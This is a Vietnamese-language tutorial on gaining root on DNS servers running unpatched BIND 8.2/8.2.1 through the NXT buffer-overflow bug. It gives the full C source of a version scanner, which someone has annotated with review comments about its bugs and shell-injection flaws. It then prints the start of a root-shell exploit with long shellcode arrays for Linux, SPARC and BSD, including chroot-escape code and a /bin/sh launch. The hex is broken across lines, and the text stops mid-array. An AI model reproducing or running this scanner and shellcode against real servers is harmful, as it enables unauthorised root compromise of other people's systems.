Hack BIND 8.2/8.2.1 qua bug "NXT"
Các máy chủ tên miền (DNS server) chạy BIND 8.2/8.2.1
không xử lý đúng các bản ghi (record) NXT. Điều này cho phép attacker
làm tràn bộ đệm của BIND và thực thi mã lệnh tùy ý trên máy chủ
tên miền, cụ thể là chiếm quyền root (theo CA-99-14, ngày 10/11/1999).
Dưới đây là cách để hack các máy chủ tên miền chạy BIND 8.2/8.2.1 gặp bug
"nxt" nhưng chưa được patch
Bước 1:
scan các DNS server gặp bug "nxt" bằng CBIND
/* BIND NXT vulnerable SCANNER - CBIND */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wait.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* DO NOT EDIT THIS LINE */
/* Command prefix used by the -f mode in main(): the target name, "/24" and a
 * shell redirect are appended and the result is handed to system(). */
#define SCAN_EXE "./nmap -p 53 "
/* EDIT: directory of NMAP */
/* main() chdir()s here before running SCAN_EXE, which is a relative path. */
#define SCAN_DIR "/home/lb0gspm/tmp/nmap/"
/* EDIT: directory of CBIND and its temporary files */
#define CBIND_DIR "/home/lb0gspm/tmp/cbind/"
/* Fixed scratch files: shell redirects in main() and Scan() write command
 * output here, and the program reads it back with fopen()/stat().
 * NOTE(review): main() refuses to run unless euid is 0, so these fixed,
 * predictable names are written by root through the shell; every Scan() call
 * reuses the same two files. */
#define R1_DIR "/home/lb0gspm/tmp/cbind/result1.cbind"
#define R2_DIR "/home/lb0gspm/tmp/cbind/result2.cbind"
/* Queries one server's version.bind banner and prints a line on a match. */
int Scan( char *ip );
/* Returns the text after the third '.' of a dotted address. */
char *GetSubnet( char *ip );
/* Returns a copy of ip with the text after the third '.' replaced. */
char *ChangeSubnet( char *ip, char *subnet );
/* Formats a small integer as a newly allocated decimal string. */
char *itoa( int i );
/*
 * Entry point of the banner scanner.
 *
 * Parses -s / -f / -i and one target name from argv, requires euid 0,
 * resolves the target, then either checks that single host with Scan(),
 * walks the last octet 0..255 (-s), or feeds "nmap -p 53 <target>/24"
 * output to Scan() line by line (-f).  -i only prints author information.
 *
 * option[0] = -i, option[1] = -s, option[2] = -f.
 *
 * NOTE(review): this function has several memory-safety and shell-handling
 * defects that are flagged inline; the code itself is reproduced unchanged.
 */
int main( int argc, char *argv[] )
{
struct in_addr addr;
struct hostent *host_entry;
unsigned short int option[3], i, wait_st;
unsigned char *name;
unsigned char *cmd;
unsigned char *ip, *subnet, *ip_s;
unsigned char *temp;
FILE *fp;
printf( "Check BIND v 2.00b \n" );
printf( "Bind NXT vulnerablity scanner\n\n" );
/* NOTE(review): none of these allocations is checked for NULL, and the
 * unsigned char * variables are passed to char * string functions below. */
name = (char *)malloc( 200 );
ip = (char *)malloc( 16 );
ip_s = (char *)malloc( 16 );
subnet = (char *)malloc( 4 );
cmd = (char *)malloc( 50 );
if( argc == 1 )
{
printf( "Options: \n" );
printf( " -s SUB-NET SCAN ( SLOW BUT HIGH PRECISE )\n" );
printf( " -f SUB-NET SCAN ( FAST BUT LOW PRECISE / NMAP REQUIRE )\n" );
printf( " -i PRINT INFOMATION\n\n" );
printf( "Examples: \n" );
/* NOTE(review): the next string literal is split across two physical lines
 * as shown on this page; an unescaped newline inside a literal does not
 * compile. */
printf( " cbind victim.com ( IT WILL SCAN IF TARGET IS VULNERABLE OR NOT
)\n" );
printf( " cbind victim.com -s ( IT WILL SCAN ALL SUB-NETs IN DETAIL )\n" );
printf( " cbind -f victim.com ( IT WILL SCAN SUB-NETs LOW PRECISE )\n\n" );
exit(0);
} else {
option[0] = 0;
option[1] = 0;
option[2] = 0;
/* Each argument is either one of the three flags or the target name;
 * the flags are mutually exclusive. */
for( i = 1; i < argc; i++ )
{
if( strcmp( argv[i], "-s" ) == 0 )
{
if( option[2] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use option -s with -i.\n" );
exit(0);
}
printf( "Sub-net( high precise ) scan mode ACTIVATED.\n" );
printf( "It can takes long.\n\n" );
option[1] = 1;
continue;
}
if( strcmp( argv[i], "-f" ) == 0 )
{
if( option[1] == 1 )
{
printf( "Can not use options -s, -f at the same time.\n" );
exit(0);
}
if( option[0] == 1 )
{
printf( "Can not use options -f with -i.\n" );
exit(0);
}
printf( "Sub-net( low precise ) scan mode ACTIVATED.\n" );
printf( "It require NMAP 2.07 or higher version.\n\n" );
option[2] = 1;
continue;
}
if( strcmp( argv[i], "-i" ) == 0 )
{
if( (option[1] == 1) || (option[2] == 1) )
{
printf( "Can not use option -i with -s(or -f).\n" );
exit(0);
}
option[0] = 1;
continue;
}
/* NOTE(review): unbounded copy of a command-line argument into the 200-byte
 * buffer.  If only flags are given, name is never written and is read
 * uninitialized below. */
strcpy( name, argv[i] );
}
}
if( geteuid() != 0 )
{
printf( "Error! You are not ROOT!\n" );
exit(0);
}
/* Treated as a host name.  NOTE(review): a first character of '0' or '9'
 * satisfies both this test and the "numeric" test further down. */
if( (name[0] <= '0') || (name[0] >= '9') )
{
host_entry = gethostbyname( name );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
/* NOTE(review): overwrites the malloc()ed ip pointer with the return value
 * of inet_ntoa(); <arpa/inet.h> is not among this listing's includes. */
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
/* Treated as a dotted address. */
if( (name[0] >= '0') && (name[0] <= '9') )
{
/* NOTE(review): gethostbyaddr() takes a binary address and its size; this
 * call passes the text form and strlen() of it. */
host_entry = gethostbyaddr( name, strlen(name), AF_INET );
if( host_entry == NULL )
{
if( option[0] != 1 ) {
printf( "Can not scan %s.\n", name );
exit(0);
}
}
if( option[0] != 1 ) {
addr = *((struct in_addr *)host_entry->h_addr);
ip = (unsigned char *)inet_ntoa( addr );
subnet = GetSubnet( ip );
}
}
/* No mode flag: check the single resolved address and clean up. */
if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) )
{
Scan( ip );
printf( "Scanning Done.\n" );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
}
/* -s: one child per last-octet value; the parent waits for each child
 * before forking the next, so the checks run one after another. */
if( option[1] == 1 )
{
for( i = 0; i < 256; i++ )
{
if( fork() == 0 )
{
strcpy( subnet, itoa( i ) );
ip_s = ChangeSubnet( ip, subnet );
Scan( ip_s );
remove( R1_DIR );
remove( R2_DIR );
exit(0);
} else {
wait( NULL );
}
continue;
}
printf( "Scanning Done.\n" );
exit(0);
}
/* -f: run nmap on <name>/24, keep the lines containing "Interesting", and
 * hand whatever host text is found on each line to Scan(). */
if( option[2] == 1 )
{
/* NOTE(review): cmd is 50 bytes, but SCAN_EXE plus "/24", " > " and R1_DIR
 * already exceed that before name is added, and the grep command below is
 * longer still - both strcat() chains write past the allocation.
 * NOTE(review): name comes straight from argv and is pasted into a shell
 * command line that runs with euid 0; it is never validated or quoted. */
strcpy( cmd, SCAN_EXE );
strcat( cmd, name );
strcat( cmd, "/24" );
strcat( cmd, " > " );
strcat( cmd, R1_DIR );
chdir( SCAN_DIR );
system( cmd );
strcpy( cmd, "grep \"Interesting\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
/* NOTE(review): fopen() reports failure with NULL; an ordered comparison
 * of the pointer with 0 does not test for that. */
if( ( fp = fopen( R2_DIR, "r" ) ) < 0 )
{
printf( "File Open Error!\n" );
exit(0);
}
while( 1 )
{
bzero( name, 200 );
temp = (char *)malloc( 200 );
strcpy( temp, " " );
/* NOTE(review): at end of file fgets() returns NULL, which replaces the only
 * pointer to the buffer just allocated (leak on exit from the loop). */
temp = fgets( temp, 100, fp );
if( temp == NULL ) break;
/* The fixed offsets 21 and 23 assume a particular nmap output layout -
 * presumably "Interesting ports on <name> (<address>)"; TODO confirm.
 * NOTE(review): the line length is never checked, so these indexes can read
 * bytes of temp that fgets() did not fill. */
if( temp[21] == ' ' )
{
for( i = 0; i < 16; i++ )
{
if( (temp[i+23] != ' ') && (temp[i+23] != ')') )
{
if( (temp[i+23] >= '0') && (temp[i+23] <= '9') )
{
name[i] = temp[i+23];
} else {
if( temp[i+23] == '.' )
name[i] = temp[i+23];
}
}
}
}
/* NOTE(review): in this branch every non-space byte of the line (up to 50)
 * is copied, with no restriction to host-name characters.  The text
 * originates from nmap's report about remote hosts and is then placed in a
 * shell command by Scan(). */
if( temp[21] != ' ' )
{
for( i = 0; i < 50; i++ )
{
if( temp[i+21] != ' ' ) name[i] = temp[i+21];
}
}
Scan( name );
free(temp);
}
remove( R1_DIR );
remove( R2_DIR );
}
/* -i: print author and version information only. */
if( option[0] == 1 )
{
printf( "Creator : Laks Bluesky\n" );
printf( "E-mail : lb0gspm@hanmail.net\n\n" );
printf( "Version : 2.00 beta\n\n" );
printf( "2000.06.19\n" );
exit(0);
}
}
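/*
 * itoa - format an int as decimal text in a newly allocated buffer.
 *
 * The original hand-rolled version only produced correct digits for
 * 0..999 and wrote garbage characters for negative or larger values; it
 * also never checked malloc().  snprintf() handles the whole int range and
 * always terminates the string.
 *
 * Returns a malloc()ed string the caller must free(), or NULL if the
 * allocation fails.  For 0..255 the result is at most three characters
 * plus the terminator, which is what a 4-byte destination can hold.
 */
char *itoa( int i )
{
    enum { INT_TEXT_MAX = 12 };   /* room for "-2147483648" and the NUL */
    char *ret = malloc( INT_TEXT_MAX );

    if( ret == NULL )
    {
        return NULL;
    }
    /* Bounded formatting: cannot write past INT_TEXT_MAX bytes. */
    snprintf( ret, INT_TEXT_MAX, "%d", i );
    return ret;
}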
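/*
 * ChangeSubnet - build a copy of a dotted address with the text after the
 * third '.' replaced by `subnet` (despite the name, that is the last octet).
 *
 * The original copied `ip` into a 16-byte buffer with strcpy(), searched
 * for the third dot without stopping at the end of the string, and then
 * copied exactly four bytes from `subnet` regardless of its length.  This
 * version stops at the terminator, checks the combined length against the
 * buffer, and copies only the bytes that exist.
 *
 * ip      dotted text with at least three '.' characters
 * subnet  NUL-terminated replacement for the final component
 *
 * Returns a malloc()ed, NUL-terminated string the caller must free(), or
 * NULL when an argument is NULL, `ip` has fewer than three dots, the result
 * would not fit in 16 bytes, or the allocation fails.
 */
char *ChangeSubnet( char *ip, char *subnet )
{
    enum { IPV4_TEXT_MAX = 16 };   /* "255.255.255.255" and the NUL */
    const char *p;
    size_t prefix_len;
    size_t tail_len;
    int dots = 0;
    char *ip_s;

    if( ip == NULL || subnet == NULL )
    {
        return NULL;
    }
    /* Advance p to the character just after the third dot. */
    for( p = ip; *p != '\0' && dots < 3; p++ )
    {
        if( *p == '.' )
        {
            dots++;
        }
    }
    if( dots != 3 )
    {
        return NULL;
    }
    prefix_len = (size_t)( p - ip );
    tail_len = strlen( subnet );
    /* Reject anything that would not fit together with the terminator. */
    if( prefix_len + tail_len >= IPV4_TEXT_MAX )
    {
        return NULL;
    }
    ip_s = malloc( IPV4_TEXT_MAX );
    if( ip_s == NULL )
    {
        return NULL;
    }
    memcpy( ip_s, ip, prefix_len );
    memcpy( ip_s + prefix_len, subnet, tail_len + 1 );   /* includes the NUL */
    return ip_s;
}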
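/*
 * GetSubnet - return the text that follows the third '.' of a dotted
 * address (despite the name, that is the last octet).
 *
 * The original searched for the third dot without stopping at the end of
 * the string and then copied four bytes unconditionally, which reads past
 * the terminator for short octets and can leave the result unterminated.
 * This version stops at the terminator, copies at most three characters and
 * always terminates the result.
 *
 * Returns a malloc()ed 4-byte buffer the caller must free().  The buffer
 * holds an empty string when `ip` is NULL or has fewer than three dots, so
 * it stays usable as a scratch buffer for a short octet string.  Returns
 * NULL only if the allocation fails.
 */
char *GetSubnet( char *ip )
{
    enum { OCTET_BUF = 4 };   /* three digits and the NUL */
    char *ret = calloc( OCTET_BUF, 1 );
    const char *p;
    size_t n = 0;
    int dots = 0;

    if( ret == NULL || ip == NULL )
    {
        return ret;
    }
    /* Advance p to the character just after the third dot. */
    for( p = ip; *p != '\0' && dots < 3; p++ )
    {
        if( *p == '.' )
        {
            dots++;
        }
    }
    if( dots != 3 )
    {
        return ret;   /* malformed input: empty string */
    }
    /* calloc() already zeroed the buffer, so the copy stays terminated. */
    while( n < OCTET_BUF - 1 && p[n] != '\0' )
    {
        ret[n] = p[n];
        n++;
    }
    return ret;
}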
/*
 * Scan - ask one name server for its version.bind banner and report it.
 *
 * Runs "dig @<ip> version.bind chaos txt" through system() with the output
 * redirected to R1_DIR, greps the VERSION.BIND. line into R2_DIR, reads the
 * quoted version text from that file and compares it with a fixed list.
 * Prints a message for "8.2", "8.2.1" and "8.2.2"; every path chdir()s to
 * CBIND_DIR and returns 0, so the return value carries no result.
 *
 * NOTE(review): the banner is whatever the server reports about itself, so
 * a match or a non-match is an indication only, not proof of patch level.
 * NOTE(review): "8.2.2" is reported here although the page title and the
 * program banner name only 8.2/8.2.1 - confirm against the advisory.
 */
int Scan( char *ip )
{
unsigned short int i;
unsigned char c;
unsigned char *cmd;
unsigned char *version;
FILE *fp;
struct stat result;
/* NOTE(review): neither allocation is checked, and neither is freed on any
 * return path. */
cmd = (char *)malloc( 200 );
version = (char *)malloc( 9 );
printf( "Scanning... %s\n", ip );
/* NOTE(review): ip is appended to a shell command without validation or
 * quoting and without a length check against the 200-byte buffer.  main()
 * can pass text taken from nmap's output here, and the program runs with
 * euid 0, so shell metacharacters in that text would be interpreted by the
 * shell.  An exec-style call with an argument vector, after checking that
 * ip contains only host-name/address characters, avoids the shell. */
strcpy( cmd, "dig @" );
strcat( cmd, ip );
strcat( cmd, " version.bind chaos txt > " );
strcat( cmd, R1_DIR );
strcat( cmd, " 2> /dev/null" );
system( cmd );
strcpy( cmd, "grep \"VERSION.BIND.\" " );
strcat( cmd, R1_DIR );
strcat( cmd, " > " );
strcat( cmd, R2_DIR );
system( cmd );
/* NOTE(review): stat()'s return value is ignored; if it fails, result is
 * read uninitialized on the next line. */
stat( R2_DIR, &result );
/* Fewer than 30 bytes means grep found no usable banner line. */
if( result.st_size < 30 )
{
chdir( CBIND_DIR );
return 0;
}
/* NOTE(review): fopen() signals failure with NULL; this ordered comparison
 * with 0 does not detect it, and fp is never fclose()d. */
if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 )
{
/* Discard the first 29 bytes - presumably the fixed-width prefix of dig's
 * answer line up to the opening quote; TODO confirm against dig output. */
for( i = 0; i < 29; i++ )
{
c = fgetc( fp );
}
/* Copy up to 9 bytes, stopping at the closing quote.
 * NOTE(review): if no quote appears within 9 bytes, version is left without
 * a terminator and the strcmp() calls below read past the 9-byte buffer.
 * c is unsigned char, so EOF from fgetc() cannot be recognised. */
for( i = 0; i < 9; i++ )
{
c = fgetc( fp );
if( c == '"' )
{
version[i] = '\0';
break;
}
version[i] = c;
}
} else {
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. \n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.1" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. \n" );
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.2.2" ) == 0 )
{
printf( "%s: IT IS VULNERABLE! ", ip );
printf( "Try it. \n" );
chdir( CBIND_DIR );
return 0;
}
/* The next two branches do exactly what the fall-through at the end does:
 * nothing is printed for these versions. */
if( strcmp( version, "8.2.2-P5" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
if( strcmp( version, "8.1.2" ) == 0 )
{
chdir( CBIND_DIR );
return 0;
}
chdir( CBIND_DIR );
return 0;
}
* Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận
diện version của BIND
NSLOOKUP
# nslookup
Default Server: ns.yourco.bogus
Address: 333.333.333.333
> set class=chaos
> set type=txt
> version.bind
Server: ns.yourco.bogus
Address: 333.333.333.333
VERSION.BIND text = "8.2.2-P5"
>
DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>)
dig version.bind txt chaos @<server>
hoặc
dig @<server> txt chaos version.bind
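Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug
"nxt". Lưu ý: chuỗi version.bind là do chính server tự trả về và quản trị viên
có thể đổi hoặc ẩn nó, nên kết quả này chỉ mang tính tham khảo; để chắc chắn,
quản trị viên cần kiểm tra trực tiếp phiên bản BIND đã cài và bản vá theo
CA-99-14.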
Bước 2: lấy root shell bằng T666
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x4
6,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,
0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x8
0,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0
x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0, 0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0
x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa
7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0 x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x 0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3 ,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0
x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74, 0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70, 0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e, 0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69, 0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62, 0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65, 0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f, 0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f, 0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x 4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4, 0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x
56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x 80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x 80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x 80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0
,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff, 0x2f,0x62,0x69,0x6e,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0x ff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61
,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d} ;
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0 xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x 0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0 x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x
82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x9 1,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0 xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x 0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0, 0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0x c9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0x
bf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0
x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73 ,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0 x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0 x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39, 0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0x
b0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0
x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0 ,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x4
6,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50 ,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0
x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85 ,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x 40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d, 0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1 ,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0, 0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68, 0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70, 0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72, 0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69, 0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73, 0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61, 0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b, 0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e, 0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0 x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20, 0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64, 0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff, 0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0
,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,
0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0
x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a ,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x4
6,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d
,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x8
0,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff, 0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0 x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xf
f,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73 ,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70, 0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,
0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x2
8,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30, 0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x5 0,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x ff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65, 0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72, 0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64, 0x64,0x72,0x73,0x74,0x72,
